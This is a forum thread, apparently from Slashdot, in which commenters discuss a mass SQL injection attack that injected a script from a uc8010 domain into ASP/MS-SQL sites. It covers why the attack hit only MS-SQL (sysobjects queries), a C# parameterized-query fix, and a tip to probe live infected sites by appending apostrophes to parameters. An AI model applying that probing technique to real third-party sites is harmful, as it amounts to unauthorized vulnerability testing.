I only went through a half dozen pages of a google search and all the sites were ASP on Windows. A few I could bust and and got error messages showing Windows/IIS so it looked like a very targeted attack. ie, there's something about the Windows/IIS/ASP/MS-SQL sites which make this an easy target. It it really was a generic SQL injection attack, would it not have found things like Windows/Apache/PHP/MS-SQL Windows/IIS/Perl/MS-SQL, etc? Especially since Windows and IIS are not the dominant web platform.

Just wondering why others haven't been hit or atleast I'd not found that to be the case.

LoB

Re:compromised servers

[Allador]

Well, the db part of the attack script is written such that it only works on sql server. This is because they send queries to sysobjects to find tables that have clob/text columns.

If they would have written more platform-neutral code (used INFORMATION_SCHEMA views rather than sysobjects), then there's no reason this wouldnt have worked on just about any platform that had available sql injection exposures.

My take on it is that they just wrote the attack script for a single targeted platform. It's probably just a prototype of the attack script (testing one platform), or just some lame skiddy who did minimal work to repackage an existing script available online.

Re:compromised servers

[Locutus]

yes, I know that but one can also query sysobject to get tables in PHP too and therefore, there should be a good number of PHP based sites which have MS-SQL backend getting successfully attacked. But I've not seen that.

Maybe there is something in the attack which only works for MS-ASP SQL-injections since that sure looks like the case. I just figured that someone would have picked this apart and figured it out. And who knows, maybe every site out there that uses PHP, Perl, Python, etc for web site scripting just don't use MS-SQL backends. Doubtful but a possibility. Not likely since it looks like atleast two people are: http://us3.php.net/mssql_field_type

LoB

The real question... what application?

[MogiMan]

Since the true vulnerabiluity is in the application passing the injection, does anyone know what common application(s) the vulnerable sites used?

command.Parameters.AddWithValue

[Bellum+Aeternus]

Serisouly, this is stupid. M$ has gone to great lengths to make it stupid easy to bind variables easy to use. Any developer working with System.Data should know better. Hell, any developer (period) should know better. PHP, Java, and pretty much every language that allows working with databases has a way to safely bind variables. Since this hack was targetd at M$ servers I'll give an example in C#...

To put is simply: if you're doing something like:

string SQLClean( string sOriginal ) {

if ( sOriginal == null ) {

sOriginal = String.Empty;

}

sOriginal = Regex.Replace(sOriginal, @"\\", @"\\", RegexOptions.Compiled);
sOriginal = Regex.Replace(sOriginal, @"\'", @"\'", RegexOptions.Compiled);
sOriginal = Regex.Replace(sOriginal, @"\""", @"\""", RegexOptions.Compiled);
sOriginal = Regex.Replace(sOriginal, @"\&", @"\&", RegexOptions.Compiled);

return sOriginal;

}

... then you're doing it WRONG!

The code to secure the SQL you're sending the server to execute is so easy it huts. Now, follow me here...

using(SqlConnection connection = new SqlConnection(@"connection_string_here")){

using(SqlCommand command = connection.CreateCommand()){

command.Type = CommandType.Text;

command.Parameters.AddWithValue("@param1", someValue1);
command.Parameters.AddWithValue("@param2", someValue2);
connection.Open();

using(SqlDataReader reader = command.ExecuteReader(CommandBehavior.CloseConnection)){ /* Do something with the reader here */ }

connection.Close();

}

}

I've seen too many "educated" developers attempt to do their own sql cleaning. Just assume you can't do it, because if you get it wrong your hosed - use the available libraries!

General comments about this thread

1. Not only were the effected applications susceptable to SQL Injection attacks they are also unecessarily succeeptable to XSS attack. How many more absoultely basic design problems need to occur before developers grow a clue and take responsibility for their own cluelessness?

2. SQL Injection attacks work on all platforms. MySQL is actually much harder to secure against injection attacks because of the rediculously complicated array of escape sequences supported in the syntax and possible interactions between them. If you don't use the Mysql provided escape routine parser you most likely did not do it right whereas with sane RDBMS platforms such as Oracle and MSSQL its very easy.

3. Access to RDBMS metadata (sysobjects) the user is allowed access to is not a security risk. RDBMS platforms require it to work correctly.

4. Using stored procedures for everything to prevent mallicious interaction is no different than configuring read only access to tables. Unless your application is read-only..getting owned may take when hell of an automated bot to exploit but it does not mean you are more secure. As an aside ... view based access controls can actually be very very powerful for enforcing access controls while preserving freedom of access... most people tend to ignore them. There is a difference between using prepared statements and calling stored procedures.

It's a vulnerability in MS-SQL you asshats

To everyone who claims this is an unchecked input into a script/web app/whatever: just read the source on a few of the infected pages, and try to come up with a common flaw that could be automated. Now, try to telnet into port 1433 of any of the affected sites (the ones still affected obviously). What is more likely?

Re:It's a vulnerability in MS-SQL you asshats

[Kalriath]

It's a vulnerability in MS-SQL you asshats It's not a vulnerability in MSSQL you moron. It's a vulnerability in stupidly designed applications (maybe not even a specific one, the worm could easily have just posted its attempt at every form it found) which let apostrophes through in their input. MySQL is immune because it doesn't have the sysobjects table. Oracle is immune for the same reason. They'd all be screwed if the worm used the ANSI compliant schema view.

Re:It's a vulnerability in MS-SQL you asshats

[Kalriath]

Oh, and since you probably wont believe that, go to a Google search for the script code (src=http://c.uc8010) and go to the result pages. Tack an apostrophe onto the end of a random querystring parameter - the vast majority bomb out with either a 500 (custom error page, good. But it still indicates that the query bombed because it was malformed), an "operation not allowed while object is closed" (means that they used connection.execute rather than recordset.open), or "unclosed quotation" (very bad! indicates that the server passed on the query as is, and it bombed).

Some of them have closed the actual vulnerability, which is very good.

Either way, folks, it doesn't look like a common app, just badly written custom apps.

Let's watch IIS share crash. Don't Blame Users.

[gnutoo]

This exploit should turn the little M$ tick down into a real trend. This is what happens when you try to use a badly designed consumer grade OS for web service. Let's hope companies take the hint and run back to Apache before something really bad happens.

People trying to pass the buck onto tens of thousands of individual programmers at tens of thousands of different institutions should ask yourselves why this has not happened with LAMP. If it was a market share thing, LAMP would have fallen long ago. It's not market share or users, it's a monoculture problem.

how to check

[gnutoo]

I don't know about "awesome," my first thoughts were along the lines of "oh...for fuck's sake..." and "how do I check?"

Type "uname -a". If you get "command not found", you have a problem.

Yes, it would be foolish and insulting to blame tens of thousands of programmers at tens of thousands of sites instead of the one tool they have in common.

Nothing special about MSSQL? Bullshit.

[gnutoo]

there is nothing specific about this attack to MS SQL Server at all.

So tell me about mass exploits of LAMP.

Re:Let's watch IIS share crash. Don't Blame Users.

[Allador]

Are you being serious?

SQL Injections have nothing to do with IIS or LAMP. It's just bad programmers.

There's a reason why nearly every PHP app in existence is plagued with constant ownership. It's name is sql injection (and misconfiguration by allowing global variable modification).

You're barking up the wrong tree here.

Re:Nothing special about MSSQL? Bullshit.

[Allador]

LOL are you serious?

Google for phpBB and "sql injection".

g phpbb "sql injection"

"Results 1 - 10 of about 226,000"

Or just google for any php app and "sql injection" and you get the same sort of thing.

PHP in particular seems designed to explicitly make it really easy to be pwned by the world.

Re:Nothing special about MSSQL? Bullshit.

[gnutoo]

Sure, I'm serious. I kind of thought the P stood for perl, but it does not seem to matter. Even when I add the keyword "mass" to your search, all I get is "might be" "could be". Can you point me to a real world mass SQL exploit outside of the M$ world? A quarter million Chicken Little search returns is not convincing.

Re:Nothing special about MSSQL? Bullshit.

[Allador]

Nearly every one of those links on the google search is to a known and published sql injection attack against phpbb. Thats pretty 'mass'. Try to administer a phpBB install of any popularity sometime, its a pretty miserable experience because of things like this.

If you mean a sql injection attack on the underlying technology (IIS, mssql, etc), then I think you're misunderstanding what a sql injection is.

It's not a problem with a technology, its a problem with applications, or implementations of technology to serve a purpose.

So the MS stack doesnt have a problem with sql injections, but a specific app built on that stack might. Same for PHP. PHP doesnt have sql injection problems (though it sure used to make it easy to do so, but its getting better a bit), but many, many, many apps built on PHP do have sql injection problems.

So yes, for real world mass sql injection attacks, just look at any number of popular php apps. They're pretty much the king for these at the moment. phpBB, Drupal, etc etc.

And again, focusing back on the original article and topic: this attack has nothing to do with ms sql server, or any perceived weaknesses in sql server. The developers of the attack script just happened to write non portable code for that stage of the attack, if they would have used ansi standard info schema views rather than ms-specific sysobjects tables, it would have worked on most any database.

So to recap, this whole thing is NOT a database attack vector, in any way. It is a SQL Injection attack vector (which is an app level problem), which just happens to use ms sql server in this incarnation.

I think when you're talking about 'mass sql exploit' you're thinking this is an exploitable vulnerability in the database server used. That would be incorrect. The db portion of this attack is entirely incidental.

Google Toolbar's search box

If doing a google search to find affected sites, be sure to NOT use Google Toolbar's search box to search for the domain. It will recognize it as a URL and automatically forward to the site, despite the fact that Google itself has flagged the site as, "This site may harm your computer.", which you can see by doing a google search for: site:uc8010(dot)com uc8010(dot)com (with the '(dot)'s replaced with '.', obviously)